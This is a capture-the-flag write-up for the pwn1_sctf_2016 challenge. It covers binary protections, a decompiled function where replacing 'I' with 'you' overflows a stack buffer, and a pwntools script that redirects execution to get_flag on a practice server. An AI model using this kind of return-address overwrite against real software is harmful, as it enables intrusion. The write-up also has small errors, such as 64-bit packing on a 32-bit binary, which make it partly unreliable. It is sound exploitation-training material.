HugeH4rD

pwn1_sctf_2016

Ubuntu 16

---

0x01

---

checksec

[*] '/home/zelas/Desktop/pwn/pwn1_sctf_2016/pwn1_sctf_2016'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled  //栈不可执行
    PIE:      No PIE (0x8048000)

$ file pwn1_sctf_2016     
pwn1_sctf_2016: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=4b1df4d30f1d6b75666c64bed078473a4ad8e799, not stripped

IDA

vuln()函数

int vuln()
{
  const char *v0; // eax
  char s[32]; // [esp+1Ch] [ebp-3Ch] BYREF
  char v3[4]; // [esp+3Ch] [ebp-1Ch] BYREF
  char v4[7]; // [esp+40h] [ebp-18h] BYREF
  char v5; // [esp+47h] [ebp-11h] BYREF
  char v6[7]; // [esp+48h] [ebp-10h] BYREF
  char v7[5]; // [esp+4Fh] [ebp-9h] BYREF

  printf("Tell me something about yourself: ");
  fgets(s, 32, edata);	//此处限制长度为32,s在栈中的长度为3C H
  std::string::operator=(&input, s);
  std::allocator<char>::allocator(&v5);
  std::string::string(v4, "you", &v5);
  std::allocator<char>::allocator(v7);
  std::string::string(v6, "I", v7);
  replace((std::string *)v3);
  std::string::operator=(&input, v3, v6, v4);
  std::string::~string(v3);
  std::string::~string(v6);
  std::allocator<char>::~allocator(v7);
  std::string::~string(v4);
  std::allocator<char>::~allocator(&v5);
  v0 = (const char *)std::string::c_str((std::string *)&input);
  strcpy(s, v0);	//strcpy()v0覆盖s
  return printf("So, %s\n", s);	//在此处利用printf()溢出
}
//I会被置换成you

可疑函数get_flag

int get_flag()
{
  return system("cat flag.txt");
}
//0x8048F0D

0x02

---

思路

1.利用[I = you ]构造3C H覆盖s

2.栈溢出ret = get_flag

s	3CH
rbp	0x4
ret	get_flag 0x8048F0D

0x03

---

exp

from pwn import *

# io = process(['pwn1_sctf_2016'])
io = remote('node4.buuoj.cn', 27019)

get_flag = 0x8048F0D
padding = 20

payload = b'I' * padding + b'a' * 0x4 + p64(get_flag)

io.sendline(payload)
io.interactive()